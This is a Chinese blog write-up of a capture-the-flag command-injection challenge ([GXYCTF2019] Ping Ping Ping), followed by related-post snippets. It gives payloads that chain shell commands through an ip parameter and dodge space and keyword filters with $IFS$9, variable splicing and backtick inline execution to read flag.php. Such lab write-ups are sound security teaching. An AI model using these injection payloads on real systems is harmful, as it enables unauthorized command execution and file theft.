Buuctf [GXYCTF2019]Ping Ping Ping WP解析

最新推荐文章于 2024-08-29 15:01:25 发布

QiaN_djx

最新推荐文章于 2024-08-29 15:01:25 发布

阅读量199

点赞数

分类专栏： buuctf web 文章标签：服务器 linux 网络

本文链接：https://blog.csdn.net/qq_60115503/article/details/127740385

版权

buuctf web 专栏收录该内容

4 篇文章 0 订阅

订阅专栏

题目来源：GXYCTF2019
题目名称：ping ping ping

打开网页

这是一道命令执行的问题我们先pwd ls看看目录

经过测试发现网站没有过滤|和;

我们直接cat一下flag.php

发现flag.php被过滤了空格%20也被过滤了[我们使用$IFS$9来绕过]

我们cat$IFS$9index.php发现可以执行并查看到了源代码过滤了空格 bash 并且通配flag以及/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|$|$|\[|\]|\{|\}/

思路:

方法一:拼接绕过法

d=ag;x=fl;$x$d
payload:
    /?ip=||d=ag;x=fl;cat$IFS$9$x$d.php

接着ctrl+u查看源代码得到flag

方法二:内联执行法

/?ip=||cat$IFS$6`ls`
使用内联执行会将 ``内的输出作为前面命令的输入 这里之前cat了flag.php和index.php

接着ctrl+u查看源代码得到flag

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

QiaN_djx

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
Buuctf [GXYCTF2019]Ping Ping Ping WP解析

【代码】Buuctf [GXYCTF2019]Ping Ping Ping WP解析。
复制链接

扫一扫

专栏目录

buuctf [GXYCTF2019]Ping Ping Ping!

hintll的博客

06-10

1011

[GXYCTF2019]Ping Ping Ping! 这个题目的标题是ping ping ping 打开以后是这样的先是看到这个提示，看到？第一想到的就是get，那么就先get一个ip上去然后有一行回显应该是命令执行漏洞命令执行就用命令拼接符执行漏洞命令就行命令拼接符： |、||、&、&&的区别： &：无论左边是false还是true，右边都执行 &&：具有短路效果，左边是false，右边不执行。 |:无论左边是false还是true，右边都会执

BUUCTF系列 // [GXYCTF2019] Ping Ping Ping

qq_45805420的博客

10-01

379

前言本题知识点：命令执行漏洞 WP 打开题目页面，提示很明显，那就先随便 ping 个 IP 地址看看效果可以看到系统命令被正常执行了，有正确回显接下来尝试一下是否存在命令执行漏洞，首先用 ls 试一试，看看有没有提示 flag 所在的位置发现确实存在着命令执行，并且得到了新的线索先试着直接用 cat 命令读取 flag.php 文件的内容题目报了个错，（初看没太明白这个提示，后来结合其他的报错，意识到此处原因为空格被过滤了）既然题目过滤了空格，那就用绕过试试呗 PS：命令执行漏洞，绕过

参与评论您还未登录，请先登录后发表或查看评论

buuctf-web-[GXYCTF2019]Ping Ping Ping-wp

居上

06-28

218

[GXYCTF2019]Ping Ping Ping 知识点变量拼接 sh，bash下编码绕过空格过滤绕过关键字过滤过程主页： ?ip=127.0.0.1 ?ip=127.0.0.1;ls ?ip=127.0.0.1;cat flag.php 过滤了空格，使用$IFS$1来绕过 ?ip=127.0.0.1;cat$IFS$1flag.php 过滤了flag，但是可以查看下index.php ?ip=127.0.0.1;cat$IFS$1index.php |

buuctf-Ping Ping Ping

Sacrifice_li的博客

09-25

1813

进来页面简单粗暴，就知道是个命令注入了：那没什么好说的，就一个个测试呗依据命令注入来看，最常见的是ls和pwd，发现均可以执行，发现在当前目录下存在一个flag.php以及index.php 在未打开index.php之前发现： ①没有过滤 ; | 以及|| ②过滤的内容有：" ",(),<>,\,/ 以及空格做到这里实际上我就卡住了，我尝试了各种方式譬如：%0,%00,\0,/0./**/,来绕过空格过滤发现都不行，接着去网上搜索了一下如何绕过bash的空格过滤...

BUUCTF——web（[GXYCTF2019]Ping Ping Ping、[极客大挑战 2019]Knife、[极客大挑战 2019]Http）

LizePing_的博客

07-16

314

BUUCTF-web[GXYCTF2019]Ping Ping Ping做题思路 [GXYCTF2019]Ping Ping Ping 做题思路打开看题目熟悉的样子，ping本地加查看命令，得到两个php文件接着查看一下文件内容奇奇怪怪的是，我发现空格被过滤了。好家伙，百度找了找，直呼好家伙，构造payload， ...

c语言中 x20是什么意思,转义字符的问题，\ x00- \ x20是什么意思

weixin_29313817的博客

05-20

8167

\ x20是空格，对\ 0为空，表示没有任何东西，甚至没有空格，没有空格\ x20后跟一个X表示它是十六进制的，这是规则.1. 一般转义字符这种转义字符尽管由形式上的两个字符组成，但仅表示一个字符. 常用的通用转义字符是: ？\ a \ n \ t \ v \ b \ r \ f \\ \’\”？您可能已经发现转义字符'\\'代表反斜杠“ \”，转义字符'\'代表字符“'”，转义字符'\“'代表字...

BUUCTF [GXYCTF2019]Ping Ping Ping

m0_49025459的博客

04-30

701

题目打开网站就这么点东西，啥都没有，那么我们浅试一下那我们ls一下将文件名都输出出来，我们用几种方式都可以输出文件名 ?ip=127.0.0.1|ls ?ip=127.0.0.1;ls ?ip=127.0.0.1||ls 这里都是用了Windows中的管道符命令 | 直接执行后面的语句，例如 ping 127.0.0.1|whoami ||如果前面执行的语句出错，才执行后面的语句，所以前面的语句必须为假，例如 ping 1||whoami &前面的...

buuctf [GXYCTF2019]Ping Ping Ping

m0_63711447的博客

05-25

1364

1、打开题目环境 2、先ping一下试试 3、直接cat flag，提示说不能有空格 4、用%09过滤空格，可能是过滤了特殊的字符 5、

[ACTF2020 新生赛]Upload 1和[GXYCTF2019]Ping Ping Ping 1

qq_44122254的博客

02-16

274

打开靶场环境，发现是文件上传检查前后端效验情况，检查源代码存在前端效验，删除前端效验代码进行上传，后端也存在效验，过滤php文件，可选择phtml文件进行上传，写入phtml文件进行上传抓包看看代码详情如下：蚁剑连接查看flag [GXYCTF2019]Ping Ping Ping 1 打开靶场显示IP？进行Linux查看，查看发现有空格过滤，百度一波，空格过滤的绕过情况有：%20(space)、%09(tab)、$IFS9、9、9、{IFS}$9、 {IFS}、IFS 都可以进行

解决IIS中应用程序池提供服务的进程无法响应Ping或进程关闭时间超过了限制

09-30

每个应用程序池都有自己的工作进程（w3wp.exe），这些工作进程用来承载运行的Web应用程序。当应用程序池的工作进程无法响应Ping时，可能是因为某些应用程序配置错误或系统中安装的杀毒软件影响。例如，McAfee等...

wordpress实现发布文章自动ping 百度

09-29

在WordPress中，自动ping百度是一项有助于提升新发布文章搜索引擎收录速度的功能。当您在WordPress网站上发布新内容时，自动ping服务会立即通知百度，告知其有新的内容更新，从而加速百度蜘蛛抓取和索引您的文章。...

Linux网络编程——C/C++Web服务器（二）：IO多路复用select/poll/epoll实现服务器监听多客户端事件

GIS热爱者

08-26

1308

同步IO多路复用——使用select/poll/epoll实现服务器同时监听多客户端的事件，通过单线程循环处理事件。分别介绍与对比了select、poll和epoll的实现流程、代码和改进的地方。

【Linux】如何快速查看 linux 服务器有几个cpu

2024 做自己的太阳

08-22

845

默认情况下，它会显示可用的处理单元总数（如果有超线程，这个数可能是物理核心数的两倍）。文件包含了CPU的详细信息，包括每个CPU核心的信息。通过查看这个文件，你可以计算物理CPU的数量或核心数。并不直接显示物理CPU的数量或核心数，但你可以通过逻辑CPU的数量和每个物理CPU的核心数来推断。命令是一个查看CPU架构信息的工具，它可以显示CPU的数量、核心数、每个核心的线程数等信息。行，这表示总的逻辑CPU数量（如果启用了超线程，这个数值可能是物理核心数的两倍）。要获取物理CPU核心的数量，你可以查看。

Mysql在服务器中的源码部署

最新发布

m0_68635801的博客

08-29

329

复制mysql的服务文件到mysqld启动文件下。编辑my.cnf 文件。最后初始化，就OK了。

服务器远程管理

m0_64827698的博客

08-26

907

SSH两种级别的安全认证：基于口令（口令在网络上传播，易受中间人攻击），基于密钥（传公钥，公钥是否相同，公钥加密质询，私钥解密）（密钥不在网络上传）2.启用服务services.msc（telnet）/配置远程桌面服务gpedit.msc（rdp）/使⽤SSH，你可以把所有传输的数据进⾏加密，这样“中间⼈”这种攻击⽅式就不可能实现了。实验总结：在windows开启telnet服务（2019不支持），RDP服务，SSH。SSH协议允许⽤户通过配置⽂件⾃定义选择加密算法，以优化安全性和性能。

服务器被渗透的表现及检测方法

@云安全小杜

08-23

810

本文将详细介绍服务器遭受渗透攻击后的常见症状，并提供一些实用的检测方法。我们还将通过具体的案例和代码示例来帮助读者更好地理解和检测服务器的安全状况。 1. 引言 服务器渗透是指攻击者未经授权访问服务器资源的过程。一旦服务器被成功渗透，可能会出现一系列异常行为，对业务运营产生严重影响。因此，及时发现并响应这些异常至关重要。 2. 渗透攻击的常见症状当服务器被渗透时，可能会出现以下几种典型的表现形式：系统资源消耗异常：CPU、内存、磁盘空间和网络带宽的使用率突然上升。异常登录活动：非工作时间的登录尝试、

服务器机房与数据中心的区别？

wanhengwangluo的博客

08-23

590

随着服务器的广泛应用，越来越多的企业选择服务器租用或者是托管业务，选择服务器租用和托管为企业节省了一定的经济成本，一般都会放置在专业的服务器机房中，而在徐州服务器租用则有着专业的数据中心，同能够保障服务器的稳定性与安全性，本文主要来介绍一下服务器机房与数据中心的区别是什么？服务器机房与数据中心相比较来说整体的规模会小一点，放置的服务器数量会有限制，在冷却系统上，数据中心里的设备会更加的先进与有效；

直播平台直播API集成之Facebook篇

jspyth的博客

08-29

696

本篇我们来介绍如何使用Facebook 的直播API（Facebook Live API）创建直播。

[GXYCTF2019]Ping Ping Ping

09-14

[GXYCTF2019]Ping Ping Ping是一道关于命令注入的题目。在提供的引用中，我们可以看到一个简单的PHP代码段，通过传递ip参数进行ping命令的执行。同时，引用中还给出了一些限制条件，如禁止使用特殊符号、空格、bash...